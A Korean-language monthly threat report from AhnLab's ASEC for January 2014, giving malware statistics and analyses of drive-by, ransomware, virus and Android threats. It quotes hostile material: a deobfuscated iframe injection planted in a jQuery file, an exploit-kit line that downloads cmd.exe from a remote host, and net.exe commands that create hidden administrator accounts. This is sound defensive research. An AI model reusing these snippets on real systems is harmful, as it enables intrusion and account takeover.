ASEC REPORT VOL.49 2014.01
CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴 (www.ahnlab.com) 에서확인하실수있습니다. 2014 년 1 월보안동향 악성코드동향 01. 악성코드통계 03 02. 악성코드이슈 06 - 북한관련문서로위장해사용자정보노려 - hosts 파일변조악성코드, 날씨정보사이트에서유포돼 - 메신저로전달되는악성코드, 크립토락커 - 웹하드사이트를통한악성코드유포 - 불규칙적으로나타나는팝업창 - 표적공격으로정보유출하는 Win32/Bodegun 바이러스 03. 모바일악성코드이슈 15 - PC를이용해스마트폰감염시키는윈도악성코드 - 카드사정보유출사건을악용한스미싱주의 - 안드로이드시스템을파괴하는 부트킷 보안동향 01. 보안통계 18-1 월마이크로소프트보안업데이트현황 02. 보안이슈 19-400Gbps 규모의 NTP 증폭 (Reflection) 공격발생 웹보안동향 01. 웹보안통계 21
3 악성코드동향 01. 악성코드통계 트로이목마, 새해에도기승 ASEC 이집계한바에따르면, 2014 년 1 월에감염이보고된악성코드는 334 만 7731 건으로나타났다. 이는전월 540 만 4470 건에비해 205 만 6739 건이감소한수치다 ([ 그림 1-1]). 이중가장많이보고된 악성코드는 Trojan/Win32.Hupe 이었으며, Trojan/Win32.OnlineGameHack 과 Trojan/Win32.Agent 가그 뒤를이었다 ([ 표 1-1]). 그림 1-1 월별악성코드감염보고건수변화추이 10,000,000 5,000,000 3,843,523 64.3% 5,404,470 3,347,731 40.6% 38.1% 0 11 12 01 표 1-1 2014년 1월악성코드최다 20건 ( 감염보고악성코드명기준 ) 순위 등락 악성코드명 건수 비율 1 NEW Trojan/Win32.Hupe 574,098 22.2% 2 NEW Trojan/Win32.OnlineGameHack 372,715 14.4% 3 NEW Trojan/Win32.Agent 236,277 9.1% 4 4 Win-Trojan/Patched.kg 199,525 7.7% 5 NEW Adware/Win32.Graftor 140,469 5.4% 6 NEW Adware/Win32.KorAd 111,774 4.3% 7 NEW Trojan/Win32.Urelas 97,782 3.8% 8 NEW Trojan/Win32.Starter 88,384 3.4% 9 NEW Trojan/Win32.Generic 80,763 3.1% 10 NEW Trojan/Win32.Wgames 75,568 2.9% 11 9 Idx/Exploit.Gen 75,083 2.9% 12 NEW PUP/Win32.SubShop 71,137 2.7% 13 NEW PUP/Win32.Helper 70,870 2.7% 14 NEW Textimage/Autorun 59,637 2.3% 15 NEW Backdoor/Win32.Plite 59,522 2.3% 16 NEW Trojan/Win32.Gen 58,331 2.3% 17 NEW Adware/Win32.Agent 57,960 2.2% 18 NEW Trojan/Win32.Downloader 56,113 2.2% 19 NEW PUP/Win32.SearchKey 53,072 2.0% 20 NEW Unwanted/Win32.Keygen 52,592 2.0% TOTAL 2,591,672 100.0 %
4 신종악성코드트로이목마가 81.3% [ 표 1-2] 는 1 월에신규로접수된악성코드중감염보고가가장많았던 20 건을정리한것이다. 이 중 Win-Trojan/Win32.Hupe 가총 57 만 1142 건으로가장빈번히보고된것으로조사됐다. Trojan/ Win32.OnlineGameHack 은 19 만 5273 건, Adware/Win32.Graftor 는 9 만 2421 건을각각기록해그 뒤를이었다. 표 1-2 1월신종악성코드최다 20건 순위 악성코드명 건수 비율 1 Trojan/Win32.Hupe 571,142 39.8% 2 Trojan/Win32.OnlineGameHack 195,273 13.6% 3 Adware/Win32.Graftor 92,421 6.4% 4 Trojan/Win32.Agent 87,998 6.1% 5 Trojan/Win32.Wgames 66,947 4.7% 6 Trojan/Win32.Urelas 56,625 3.9% 7 Trojan/Win32.Generic 44,166 3.1% 8 PUP/Win32.SubShop 43,548 3.0% 9 Trojan/Win32.Malpacked3 36,882 2.6% 10 Backdoor/Win32.Plite 34,650 2.4% 11 Trojan/Win32.Depok 32,804 2.3% 11 PUP/Win32.SearchKey 29,438 2.1% 13 PUP/Win32.GearExt 25,073 1.7% 14 Trojan/Win32.OnLineGames 24,825 1.7% 15 Adware/Win32.Agent 23,775 1.7% 16 Malware/Win32.Generic 16,047 1.1% 17 Trojan/Win32.BitCoinMiner 14,276 1.0% 18 PUP/Win32.Enumerate 13,126 0.9% 19 PUP/Win32.AutoDefend 13,012 0.9% 20 Packed/Win32.MultiPacked 12,723 0.9% TOTAL 1,434,751 100.0 % 신종악성코드도트로이목마가강세 [ 그림 1-2] 는 2014 년 1 월한달간안랩고객으로부터감염이보고된악성코드의유형별비율을집 계한결과다. 트로이목마가 73.5% 로가장높은비중을차지했고, 애드웨어 11.9%, PUP 7.4%, 익스 플로잇이 2.9% 의비율을각각차지했다. 그림 1-2 악성코드유형별비율
5 악성코드유형별감염보고전월비교 [ 그림 1-3] 은악성코드유형별감염비율을전월과비교한것이다. 애드웨어, 익스플로잇, 트로이목 마, PUP 가전월에비해증가세를보이고있는반면스크립트, 스파이웨어, 바이러스등은전월에비 해감소했다. 앱캐어, 드롭퍼, 웜은전월수준을유지했다. 그림 1-3 2013 년 12 월 vs. 2014 년 1 월악성코드유형별비율 신종악성코드유형별분포 1 월의신종악성코드를유형별로살펴보면트로이목마가 81.3% 로압도적으로많았다. PUP 는 8.6%, 애드웨어는 8.1% 로각각집계됐다. 그림 1-4 신종악성코드유형별분포
6 악성코드동향 02. 악성코드이슈 북한관련문서로위장해사용자정보노려최근북한관련문서로위장해사용자의정보를유출시키는악성코드가발견돼주의가요구된다. [ 그림 1-5] 와같이파일의내용은자유북한방송등의북한과관련된기관이나단체의것처럼보인다. [ 그림 1-7] 과같이생성되는 HwpLib.dll 파일내부문자열에서사용자정보및 hwp, doc 같은문서파일정보를수집하는기능이확인된다. 그림 1-7 HwpLib.dll 의 Bin Text 내용일부 그림 1-5 북한관련내용으로위장한문서의내용 수집된정보는 [ 그림 1-8] 과같이 79e80a290c00.gif 파일형태로저장돼특정 URL로유출된다. [ 그림 1-6] 을보면 북한 이라는주제를가진취약점이있는한글문서가다수확인된다. 그림 1-6 같은주제 ( 북한 ) 의취약점을악용한한글문서파일들 취약점이있는한글문서 단체장명단 ( 라이온스 ) 파일을실행하면아래와같은파일이생성되는데 HwpLib.dll 파일이사용자의시스템정보를수집한다. HwpLib.dll 파일은한글프로그램실행시함께로딩된다. [ 파일생성 ] CREATE C:\DOCUME~1\vmuser\LOCALS~1\Temp\HwpLib.dll CREATE C:\HNC\Hwp70\79e80a290c00.gif 그림 1-8 79e80a290c00.gif 파일내용 [ 그림 1-9] 를보면사용자정보유출을위해특정 IP로네트워크연결을시도하지만현재는대다수 IP가유효하지않았다.
7 그림 1-12 웹사이트에삽입된악성스크립트 그림 1-9 특정 IP 로네트워크연결시도 난독화된스크립트를풀어보면 [ 그림 1-13] 과같이 iframe에연결된 URL 정보를확인할수있다. V3 제품은관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > HWP/Exploit (2014.01.10.00) Win-Trojan/Agent.25600.AAW (2014.01.08.07) 그림 1-13 스크립트난독화해제 해당웹페이지는자바, IE 취약점을이용해시스템에악성코드를감염시킨다. hosts 파일변조악성코드, 날씨정보사이트에서유포돼최근날씨정보를확인하기위해사용자들이자주방문하는웹사이트에서 hosts 파일을변조하는악성코드가유포돼사용자들의주의가요구된다. 해당사이트내부에는난독화된악성스크립트가삽입되어있으며 GongdaExploitKit을통해악성코드를유포시켰다. [ 그림 1-10] 은해당웹사이트로, 웹사이트메인페이지에서로딩되는 main_golf_data.js 파일에난독화된악성스크립트가삽입되어있다. 그림 1-14 웹익스플로잇툴킷 ( 난독화해제후 ) 악성코드가실행되면 [ 그림 1-15] 에표시된것처럼파일이생성되며 hosts 파일도함께변조된다. 그림 1-10 악성코드유포지로악용된웹사이트 [ 그림 1-11] 과같이난독화된악성스크립트 (main_golf_data.js) 파일이 GongDaExploitKit을로딩한다. 그림 1-15 악성코드실행화면 악성코드는 [ 그림 1-16] 과같이 hosts 파일을변조하여금융사이트접근시피싱사이트로접속을유도한다. 그림 1-11 날씨배너광고 그림 1-16 변조된 hosts 파일정보
8 V3 제품에서는관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > Packed/Win32.Morphine (AhnLab, 2014.01.13.00) JS/Agent (AhnLab, 2014.01.15.00) JS/Iframe (AhnLab, 2014.01.15.00) 메신저로전달되는악성코드, 크립토락커지난해 11월경시스템에저장된문서, 이미지파일등을암호화하여금전적인대가를요구하는악성코드인크립토락커 (CryptoLocker) 가이메일의첨부파일을통해유포된사례를 ASEC Report Vol.47에서다룬바있다. 최근에는특정메신저를통해유포되고있는악성코드에의한크립토락커감염증상이발생하고있어주의가요구된다. 최초유포방법은확인되지않았으나, 특정메신저를통해단축 URL이포함된메시지가전달되며해당 URL을클릭하여악성코드에감염되면메신저에등록된사용자에게동일한 URL이포함된메시지가전달된것으로알려졌다. 그림 1-19 랜섬웨어감염후바탕화면에나타난이미지해당이미지는 중요파일들이암호화되어있다. 크립토락커창이뜨지않으면다시파일을다운로드 (www.uypqnealtv.com/0388.exe) 받아실행하라 고요구한다. 해당파일역시랜섬웨어를감염시키기위한악성코드이다. 악성코드에감염되면 [ 그림 1-20] 과같이크립토락커창이뜬다. 암호화된파일리스트를확인할수있는링크와파일에대한복구비용을요구하는메시지를확인할수있다. 해당 URL을클릭하면 [ 그림 1-17] 과같이특정실행파일 (YOURS.JPG. exe) 이다운로드되고해당파일을실행하면악성코드에감염된다. 그림 1-20 크립토락커복구비용요구창 그림 1-17 리다이렉션정보이후 [ 그림 1-18] 과같이처음다운로드된악성코드와동일한경로에추가로악성파일이다운로드되어실행됐다. 또키보드입력값을후킹 (hooking) 하는기능도확인됐다. 이어 [ 그림 1-21] 과같이두가지결제수단중한가지를선택하여결제할것을유도한다. 그림 1-18 추가다운로드되는악성코드 추가로다운로드되는파일중 slk21.exe 파일에의해크립토락커에감염된다. 해당파일이다운로드되고실행되면사용자시스템내에있는이미지, 문서등의파일이암호화되어이로인한피해가발생할수있다. 랜섬웨어의일종인크립토락커에감염되면바탕화면에 [ 그림 1-19] 와같은이미지가나타난다. 그림 1-21 크립토락커결제수단선택창
9 감염된상태에서사용하던문서파일을실행하면 [ 그림 1-22] 와같이정상적으로문서가열리지않으며 암호화된문서파일을실행할수없다 는오류메시지를확인할수있다. [ 그림 1-23] 의 3은 2와동일하다. 4는해당웹하드사이트에서사용하는 jquery-1.10.2.min.js의하단부분에외부의공격으로인한악성스크립트코드가삽입돼있음을의미한다. 그리고 5의 404.html은 IE, 자바, 플래시플레이어의취약점이나타날때추가익스플로잇다운로드및실행역할을하는악성스크립트로, 해당파일역시난독화되어있다. 그림 1-22 암호화된문서파일실행오류메시지이번악성코드는기존악성코드의형태와크게다르지않지만메신저가유포경로로이용됨으로써빠른확산과다수의피해가발생한것으로보인다. 따라서메신저를통해전달된메시지나수신된메일에포함된링크, 또는첨부된파일등을확인할때는각별한주의가필요하다. [ 그림 1-24] 는웹하드에서사용되는것으로보이는키워드들이저장되어있는웹페이지이다. location.href 태그를사용하여특정사이트에자동으로접속되도록했다. V3 제품에서는관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > Win-Trojan/Zbot.495104 (2014.01.22.03) Win-Trojan/Blocker.801280 (2014.01.22.04) Win-Trojan/Buzus.124404 (2014.01.22.04) Trojan/Win32.Cryptolocker (2013.12.11.02) 웹하드사이트를통한악성코드유포얼마전다수의 URL에접속했을때특정웹하드사이트로접속되면서악성코드에감염되는일이있었다. 당시상황을분석한결과피해가발생한 URL들은 [ 그림 1-23] 과같은형태를보이고있었다. 그림 1-24 **job.net의메인페이지 [ 그림 1-24] 의붉은색네모박스로표시된사이트에접속해보면유사하게구성된웹페이지임을알수있다. 마찬가지로 location.href를사용하여특정웹페이지접속을유도했는데, 아래는특정사이트에존재하는 meta.html을띄워주는역할을하는스크립트이다. meta.html 페이지를띄워주는스크립트 <SCRIPT language=javascript> var leave=true; function stbs() { if (leave) stb.dom.script.window.open('http://****tv.com/meta.html','_ blank','scrollbars=yes,toolbar=yes,menubar=yes,location=yes,status =yes,resizable=yes'); } </SCRIPT> meta.html 에는아래와같은코드가존재하고, 해당코드를통해특정 그림 1-23 피해 URL 접속시패킷유형 웹하드사이트로접속한다. [ 그림 1-23] 에표시한 1은피해가발생한메인 URL이다. 분석결과메인페이지는정상적인웹페이지가아닌것으로확인됐다. 2는 [http://onf****7.com/ad/index.html?key=xxxxxx] 를의미한다. 해당웹페이지에는아래와같이특정웹하드사이트로접속하도록하는스크립트코드가존재한다. location.href를사용한사이트접속 <script>location.href="../ad/index.html?key=xxxxxx";</script> <meta http-equiv="refresh" content="0;url= http://veg****.com/?p_id=run1"> 앞서언급했듯이경유지를거쳐마지막으로특정웹하드사이트에접속할때악성코드감염이발생한다. [ 그림 1-25] 는악성코드유포를할당할때이다. jquery-1.10.2.min.js 를살펴보면하단부분에난독화된악성스크립트코드가존재한다. 이를풀어보면특정사이트에서악성 html을실행하는스크립트코드이다.
10 자바취약점 : CVE-2012-0507 의예시 그림 1-25 정상 vs. 악성 jquery-1.10.2.min.js else if ((gondadx<=17002 && gondadx>=17000) (gondadx<=16030 && gondadx>=16000) (gondadx<=15033 && gondadx>=15000)) { gondad.archive="yxhyzvt0.jpg"; gondad.code="gonbadexx.ohno.class"; gondad.setattribute("xiaomaolv","http://www.******lts.com/conf/ cmd.exe"); gondad.setattribute("bn","woyouyizhixiaomaolv"); 난독화해제된악성스크립트코드 if(document.cookie.indexof("googlead")==-1 document. cookie.indexof("googlead2")==-1){var cookiename = document.cookie.indexof("googlead") == -1? "GOOGLEAD" : "GOOGLEAD2";var expires=new Date();expires.setTime(expires. gettime()+24*60*60*1000); document.cookie=cookiename+"=yes;path=/;expires="+expires. togmtstring();document.write(unescape("%3ciframe%20src%3d %22http%3A%2F%2F*******%2Enet%2FSEditor%**************%2 Ehtml%22%20width%3D%22116%22%20height%3D%221%22%20 frameborder%3d%220%22%3e%3c%2fiframe%3e"));} 취약점을통해 PC에다운로드및실행되는 cmd.exe는다음과같은기능을갖고있다. 1. C&C접속 : www.nun*****ng.net 2. 위 C&C에접속될경우백도어로동작하며아래와같은기능을수행 - 파일다운로드 : 다운로드주소는 C&C로부터수신하여감염된 PC에추가로악성코드가다운로드및실행된다. cmd.exe형태로봤을때다운로드및실행되는악성코드는파밍악성코드일가능성이높다. 3. 정보탈취 - rasphone.pbk에저장된전화번호등을탈취 - 키로깅기능 - 하드웨어정보탈취 (Ex, CPU) [ 그림 1-26] 과같이난독화된 404.html은자바 7개, 플래시플레이어 1개, 인터넷익스플로러 1개등총 9개의취약점을통해악성코드를다운로드받고실행하도록되어있다 ([ 표 1-4]). 4. guest 계정활성화및관리자그룹에속하도록조작 cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add V3 제품에서는관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > Trojan/Win32.Agent(2014.01.18.06), SD140117AAEEH-000001 그림 1-26 난독화된 404.html 불규칙적으로나타나는팝업창 응용프로그램 자바 취약점 CVE-2011-3544, CVE-2012-0507, CVE- 2012-1723, CVE-2012-4681, CVE-2012-5076, CVE-2013-0422, CVE-2013-2465 웹페이지접속시불규칙적으로팝업창이나타난다는증상이보고됐다. 해당시스템은윈도정상파일 (mshta.exe) 을이용해팝업을생성했다. [ 그림 1-27] 은시스템에발생하는팝업창이다. 플래시플레이어 CVE-2013-0634 인터넷익스플로러 CVE-2012-1889 표 1-4 404.html 이사용하는취약점리스트 그림 1-27 시스템에발생하는팝업창
11 [ 그림 1-28] 은팝업창발생시프로세스익스플로러를이용해 mshta. exe 프로세스정보를확인한화면이다. Win32/Bodegun 바이러스는 PE 파일감염외에도키로깅과루트킷기능을가지고있다. 단순한감염이목적이라기보다는표적공격을통해정보를유출하기위한바이러스일가능성이높다. 감염된시스템은다른시스템에접근하여계정을만든다. 2013년가을안랩시큐리티대응센터 (ASEC) 로접수된파일에서새로운바이러스가발견되어 Win32/Bodegun으로명명되었다. 이바이러스는 2012년가을에처음제작된것으로보이며사용자가입력하는키입력내용을파일로저장하고프로세스에서자신의존재를감추는루트킷기능을가지고있었다. 그림 1-28 mshta.exe 프로세스정보 해당프로세스 (mshta.exe) 의커맨드라인정보를살펴보면팝업창발생시연결되는 URL 주소가확인된다 ([ 그림 1-29]). 1. 바이러스감염파일 V3(2013.10.07.00) 는감염된파일을 Win32/Bodegun으로진단한다. 감염된파일에는특징적으로 [ 그림 1-31] 과같이 XWAX 섹션이추가된다. 그림 1-31 감염된파일에서볼수있는 XWAX 섹션 XWAX 섹션에는로더 (Loader) 와바이러스본체인 PE 파일이미지가존재한다. 그림 1-29 커맨드라인정보 [ 그림 1-30] 의시스템예약작업정보를보면 mshta.exe를이용하여주기적으로실행되는명령이확인된다. 해당예약작업을삭제한후에는팝업창이다시나타나지않았다. 그림 1-32 로더 (Loader) 그림 1-30 예약작업등록정보 표적공격으로정보유출하는 Win32/Bodegun 바이러스 Win32/Bodegun 바이러스는 2013년 9월처음발견되었으나지금까지감염보고는많지않다. 다수의백신프로그램에서감염된파일이나관련파일을진단하지않거나트로이목마로잘못진단하고있기때문이다. 그림 1-33 바이러스본체감염된파일에는로더가존재하는데 C:\Windows\System32\ Kernel32.dll에서 GlobalAlloc, GlobalFree, CreateFileA, WriteFile, WinExec, ReadFile, CloseHandle, GetFileSize, GetModuleFileNameA
12 의 API 주소를얻는다. 2. LXWZYP 분석 LXWZYP는바이러스본체파일로 DIRECTP.dll과 sdy7x.sys 등의관련파일을생성하고 PE 파일을찾아감염시킨다. V3(2013.10.07.01) 는해당파일을 Win-Trojan/Bodegun.131072로진단한다. 이파일의생성시간은 2012년 7월 13일 20시 1분 14초이다..bedrock 섹션이존재하는것이특징이다 ([ 그림 1-37]). 그림 1-34 API 로드 실행된파일에서바이러스코드부분을읽어 C:\windows\ system32\lxwzyp (131,072 바이트 ) 를생성하고실행한다. 그림 1-37 bedrock 섹션 악성코드는패킹 (Packing) 되어있으며언패킹 (UnPacking) 과정에서디버깅유무를확인해실행중이면종료하는안티디버깅 (Anti- Debugging) 기능도존재한다. LXWZYP가실행되면 DIRECTP.dll(55,808 바이트 ) 과 SDY7X.sys(2,560 바이트 ) 등의파일이생성된다. 생성되는주요파일은다음과같다. 파일이름내용 그림 1-35 LXWZYP 생성및실행 이바이러스는윈도 XP에서는실행되지만윈도 7(32비트 /64비트) 에서실행하면 LXWZYP에서오류가발생한다 ([ 그림 1-36]). C:\windows\system32\ LXWZYP %windir%\directp.dll %windir%\sdy7x.sys C:\Windows\1 C:\Windows\LSYSTEM 악성코드본체 키로거 (Keylogger) 루트킷 (Rootkit) 드라이버 감염대상파일을담고있는텍스트 사용자가입력한키로깅내용을담고있는텍스트 이들파일은 LXWZYP 내리소스영역에존재한다. 리소스내용 102 압축된 DIRECTP.dll 파일이미지 103 압축된 dy7x.sys 파일이미지 104 바이러스감염되는로더의코드 105 바이러스감염되는로더의코드 그림 1-36 윈도 7 에서실행시 LXWZYP 에서오류발생 파일생성후키로깅, 루트킷기능을활성화시킨후감염대상을찾아파일을감염시킨다. 이때디렉터리이름에 window, Microsoft, ddk 가포함될경우에는감염시키지않는다. 감염된파일에 XWAX 섹션이추가된다. XWAX 섹션은로더 (Loader) 와바이러스 PE 파일이미지로이뤄진다.
13 3. DIRECTP.dll 과 sdy7x.sys 분석 DIRECTP.dll은키보드입력내용을가로채기위한 DLL 파일이다. V3(2013.06.05.00) 는해당파일을 Win-Trojan/Keylogger.55808.D로진단한다. 그림 1-38 Win32/Budegun 바이러스감염전과후 이파일이생성된시간은 2012년 6월 5일 6시 20분 14초이다. [ 그림1-41] 과같이 AddKeyEntry, GetKeyEventResult, InstallKeyHook, IsKeyHookInstalled, UninstallKeyHook의익스포트 (export) 함수를갖고있다. 특이한것은뮤텍스 (mutex) 로 {RMAPLE-1990-1119- KCG-2012-0606} 를만든다는점이다. 그리고 net.exe 를이용해사용자계정을추가하거나삭제한다. 리소스내용 net.exe user HelpAssistant /delete net.exe user HelpAssistant /add HelpAssistant 계정삭제 HelpAssistant 계정추가 그림 1-41 익스포트함수를가진파일생성 net.exe user HelpAssistant kkk net.exe localgroup administrators HelpAssistant /add net.exe localgroup users HelpAssistant /del HelpAssistant 계정의암호를 kkk 로변경 Administrators 그룹에 HelpAssistant 계정추가 Users 그룹에 HelpAssistant 계정삭제 Win32/Budegun 바이러스에감염되면다음과같이레지스트리내용의값을추가해윈도방화벽차단기능을무력화시킨다 ([ 그림 1-39]). dy7x.sys 는바이러스본체인 LXWZYP 프로세스를숨기는루트킷드라이버이다 ([ 그림 1-42]). V3(2013.12.06.00) 는이파일을 Win-Trojan/ Rootkit.2560.AK로진단한다. 이파일의생성시간은 2012년 6월 11일 13시 48분 57초다. Pdb 정보가 D:\Temp\2012 \6\MyVirus\HideProcess\sys\objfree\ i386\sdthook.pdb이므로 2012년 6월에제작되었을가능성이높다. SYSTEM\ControlSet001\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile 에 DoNotAllowExceptions 와 EnableFirewall 그림 1-42 LXWZYP 프로세스를숨기는루트킷드라이버 루트킷드라이버는바이러스본체인 LXWZYP를프로세스리스트에숨겨보이지않게한다. 단, [ 그림 1-43] 에서보이는것과같이프로세스리스트에서만지우기때문에탐색기로 LXWZYP 파일을찾을수있다. 그림 1-39 방화벽무력화시도또한 [ 그림 1-40] 과같이 DIRECTP.dll 파일을이용해키입력내용을가로챈후 C:\Windows\LSYSTEM에사용자가키입력내용을시간, 프로세스명과함께저장한다. 그리고 Sdy7x.sys 를로드해루트킷기능을수행한다. 그림 1-43 탐색기에서보이는 LXWZYP 파일 그림 1-40 키로그 [ 그림 1-44] 와같이커널디텍티브 (Kernel Detective) 와같은유틸리티로확인하면해당드라이버가 SSDT의 173번 NtQuerySystemI nformation(0x80503e8c) 이가리키는주소를 SDY7X.SYS 내주소인
14 0xF7C2330E( 감염될때마다바뀜 ) 로가리키고있음을알수있다. 그림 1-44 커널디텍티브 새로운 NtQuerySystemInformation 주소는 ZwQuerySystemInformaion 함수를실행한후 LXWZYP일경우숨기는역할을한다 ([ 그림 1-45]). 그림 1-45 ZwQuerySystemInformaion 함수실행
15 악성코드동향 03. 모바일악성코드이슈 그림 1-48 flashmx32.xtl - apk 설치모듈 PC를이용해스마트폰감염시키는윈도악성코드 2013년 12월 21일안드로이드운영체제스마트폰에악성앱을설치하는윈도악성코드가확인됐다. 그동안안드로이드운영체제를타깃으로한악성코드는수없이발견됐지만윈도를겨냥한악성코드는처음이다. V3에서 Trojan/Win32.Agent로진단된이악성코드는웹사이트취약점을노려 PC를감염시킨것으로추정된다. [ 그림 1-46] 은안드로이드운영체제를이용한스마트폰에윈도악성코드를감염시키는과정을나타낸것이다. 서비스로동작되는 flashmx32.xtl은 Adb를이용해안드로이드기기와통신한다. Adb는안드로이드 SDK에포함된플랫폼툴로, 단말기의개발자옵션인 USB 디버그모드가활성화된경우 PC에서안드로이드단말기로다양한명령을전달할수있다. [ 그림 1-48] 은 flashmx32.xtl 파일에서 adb의인스톨옵션으로 AVcdk.apk를설치하는모듈이다. Flashmx32.xtl가동작중인감염 PC에 USB 디버그모드가활성화된단말이접속하면 flashmx32.xtl은 [ 그림 1-48] 의모듈을호출해안드로이드단말기를감염시킨다. 안랩은지난 2012년에이윈도악성코드에의한안드로이드단말감염가능성을예상했다 (2012, "Cross-Platform Infection between PC and Android OS" Kim Yonggoo & Kang Donghyun, AhnLab http:// www.aavar.org/avar2012/program.html). 그러나이번에발견된악성코드는실제로확인된최초의사례이다. 그림 1-46 악성코드감염과정 Ggad.exe가윈도에서실행되면 flashmx32.xtl(v3 진단명 : Trojan/ Win32.Agent) 파일을 %SystemDir% 에드롭하고서비스로실행시킨다. 1flashmx32.xtl이실행되면내부에하드코딩된사이트로부터파일다운로드리스트 (iconfig.txt) 를받는다. 리스트확인후추가파일을다운로드받아지정된위치에저장한다 ([ 그림 1-47]). 그림 1-47 flashmx32.xtl 지정된위치에파일저장 그림 1-49 구글앱스토어를가장한악성앱 Flashmx32.xtl에의해설치되는 AV-cdk.apk는 [ 그림1-49] 와같이플레이스토어를가장해사용자의의심을피한다. V3 모바일을포함한 V3 PC 제품군에서 2013년 12월 22일이후 Android-Downloader/ Bankun으로진단하고치료하고있다. 이악성코드가사용자의단말기에설치될경우가짜은행앱을설치하고수신된 SMS를외부로유출할뿐만아니라수신된전화를차단하는등악성행위가우려된다.
16 그림 1-50 AV-cdk.apk 의설정파일 그림 1-53 스미싱으로유포된악성앱아이콘 카드사정보유출사건을악용한스미싱주의 최근카드사정보유출이라는사회적이슈를이용한 스미싱 형태의악성앱이다수발견돼주의가요구된다. 실행하기전에는아이콘을확인할수있지만앱을다운로드받아설치후실행하면아이콘이제거되기때문에사용자는설치되지않은것으로착각할수도있다. 악성앱의권한정보를살펴보면대략적인악성행위에대한추정이가능하다. 문자메시지, 개인정보접근, 네트워크통신등다양한행위를할것으로예상된다. 그림 1-51 스미싱메시지 그림 1-54 악성앱실행화면 ( 좌 ) / 접근권한 ( 우 ) [ 그림 1-51] 이나 [ 그림 1-52] 와같은다양한메시지를이용하여악성앱설치를유도하고있다. 이러한악성앱은 [ 그림 1-55] 와같이스마트폰의정보를탈취하는데, 추가적으로금융정보를탈취하는 bankun 계열을다운로드받도록설계되어있다. 스마트폰정보수집 - 전화번호, 모델명, 통신사, IMEI, IMSI, 주소록등 - 스마트폰에서사용중인뱅킹앱체크 ( 대상패키지명 ) "nh.smart" "com.shinhan.sbanking" "com.webcash.wooribank" "com.kbstar.kbbank" "com.hanabank.ebk.channel.android.hananbank" 그림 1-52 다양한스미싱메시지 악성앱중하나를설치하면 [ 그림 1-53] 과같은 구글앱스토어 앱이설치된다. 그림 1-55 스마트폰의정보를탈취하는코드일부
17 스마트폰사용자는안정성이확인되지않은 apk( 앱 ) 을다운로드받지않도록주의해야한다. 앱설치는반드시공식마켓을이용하고제작사및사용자평가후확인하고설치하는습관을갖는것이필요하다. V3 모바일제품에서는해당악성코드를다음과같이진단한다. <V3 모바일제품군의진단명 > Android-Trojan/Meteor.FEFCB (2014.01.23.01) 안드로이드시스템을파괴하는 부트킷 지난 1월 17일중국보안업체인 안전 360 에서는안드로이드에서동작하는 올드부트 (Oldboot) 라는부트킷 (Bootkit) 에대한분석보고서를발표했다. 안전 360 통계에따르면지난 6개월동안중국에서 50만건이넘는안드로이드단말기가이악성코드에감염됐다. 감염된단말기에서는지속적으로광고를노출하는애플리케이션이설치되는증상이나타난다. 올드부트는 /init.rc, /sbin/imei_chk, /system/app/google.apk, /system/ lib/libgooglekernel.so라는 4개의파일로이뤄져있다. Init.rc 파일은변조된안드로이드부팅스크립트로, 시스템부팅시 imei_chk 파일이실행되는스크립트가추가되어있다. service imei_chk /sbin/imei_chk class core socket imei_chk stream 666 Imei_chk 파일은내부에 Google.apk를포함하고있다. 이파일은안드로이드부팅과정중 init 과정에서 [ 그림 1-56] 과같이 init.rc 스크립트에의해실행된다. 실행된 imei_chk 파일은 AndroidKernel.apk 파일을 / system/app/ 영역에복사한다. 안드로이드는부팅시 /system/app/ 에있는모든 apk가설치되어있는지확인한다 ( 이러한앱을 pre-installed application이라고한다 ). 이과정에서설치되지않은앱이있으면시스템앱으로설치된다. 모바일백신에의해 apk 파일이삭제되더라도안드로이드단말기가재부팅될때 init.rc와 imei_chk 파일에의해 AndroidKernel.apk 파일이재설치된다. 올드부트가기존안드로이드악성코드와다른점은 /sbin 디렉토리와 init.rc 파일을변조한다는것이다. 안드로이드에서루트디렉토리와 / sbin 디렉토리는부트파티션으로부터로드되는 RAM 영역에위치한다. RAM은읽기전용파일시스템으로, 실행중에어떤변화가있더라도물리적인디스크에영향을주지않는다. 따라서시스템실행중그파티션을쓰기권한으로리마운트 (remount) 하고일부파일을삭제하더라도디스크에는영향을주지않기때문에단말기가재부팅되면이파일들이다시설치되는것이다. 올드부트는단말기에물리적으로접근해안드로이드부팅이미지자체를변경하거나루팅된시스템에서 DD와같은유틸리티를이용해부트파티션에파일을추가, 변조하는방법에의해감염된다. 아직국내에는피해가확인되지않았으며중국에서제조된일부단말기에서만감염된것으로알려졌다. 그러나국내에도유입될가능성이있으므로주의할필요가있다. 따라서구글플레이와같은공식마켓을통한앱설치와 알수없는소스 (unknown source) 설정을해제하고출처가불분명한앱이스마트폰에설치되지않도록해야한다. 올드부트에의해생성되는앱은 V3 모바일이 Android-Trojan/Oldboot 로진단하고치료한다. 하지만모바일백신은 init.rc 파일과 imei_chk파일로접근할수없다. Android-Trojan/Oldboot가스마트폰부팅시점에도계속진단된다면제작사에서배포한공식 ROM으로교체하고치료해야한다. 그림 1-56 안드로이드부팅프로세스 (* 출처 : http://www.androidenea.com/2009/06/android-boot-processfrom-power-on.html)
ASEC REPORT 49 SECURITY TREND 18 보안동향 01. 보안통계 1월마이크로소프트보안업데이트현황 2014 년 1 월마이크로소프트사에서발표한보안업데이트는총 4 건으로, 중요등급만 4 건이다. 중요 업데이트에는시스템관련업데이트 2 건과오피스관련업데이트가 1 건, 애플리케이션관련취약점 1 건이포함되어있다. 이중오피스관련취약점은원격에서코드실행이가능하여공격자들에게자 주악용되므로보안패치를신속하게적용할것을권장한다. 그림 2-1 공격대상기준별 MS 보안업데이트 중요 MS14-001 마이크로소프트워드및오피스웹애플리케이션의취약점으로인한원격코드실행문제점 MS14-002 윈도커널의취약점으로인한권한상승문제점 MS14-003 윈도커널모드드라이버의취약점으로인한권한상승문제점 MS14-004 Microsoft Dynamics AX 의취약점으로인한서비스거부문제점 표 2-1 2014 년 01 월주요 MS 보안업데이트
